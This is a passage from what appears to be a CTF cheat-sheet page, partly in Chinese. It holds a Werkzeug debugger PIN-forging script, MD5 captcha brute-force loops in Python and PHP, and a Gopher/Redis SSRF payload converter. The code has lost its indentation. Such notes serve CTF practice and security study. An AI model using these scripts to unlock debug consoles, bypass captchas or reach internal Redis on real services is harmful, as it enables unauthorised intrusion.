h = hashlib.md5()
for bit in chain(probably_public_bits, private_bits):
if not bit:
continue
if isinstance(bit, str):
bit = bit.encode('utf-8')
h.update(bit)
h.update(b'cookiesalt')
cookie_name = '__wzd' + h.hexdigest()[:20]
num = None
if num is None:
h.update(b'pinsalt')
num = ('%09d' % int(h.hexdigest(), 16))[:9]
rv = None
if rv is None:
for group_size in 5, 4, 3:
if len(num) % group_size == 0:
rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
for x in range(0, len(num), group_size))
break
else:
rv = num
print(rv)
Other Scripts
md5 Captcha
import hashlib
for i in range(1, 10000001):
s = hashlib.md5(str(i)).hexdigest()[0:6]
#s = hashlib.sha1(str(i)).hexdigest()[:6]
if s == "6d0bc1":
print(i)
break
SSRF
Gopher + Redis
转换payload格式。
#coding: utf-8
import sys
exp = ''
with open(sys.argv[1]) as f:
for line in f.readlines():
if line[0] in '><+':
continue
elif line[-3:-1] == r'\r':
if len(line) == 3:
exp = exp + '%0a%0d%0a'
else:
line = line.replace(r'\r', '%0d%0a')
line = line.replace('\n', '')
exp = exp + line
elif line == '\x0a':
exp = exp + '%0a'
else:
line = line.replace('\n', '')
exp = exp + line
print exp
MD5 验证码
php 版本:
<?php
for($a; $a<100000000; $a++){
if(substr(md5($a),-6,6) == 'a5ea8a'){
echo $a;
exit();
}
}
?>
Last updated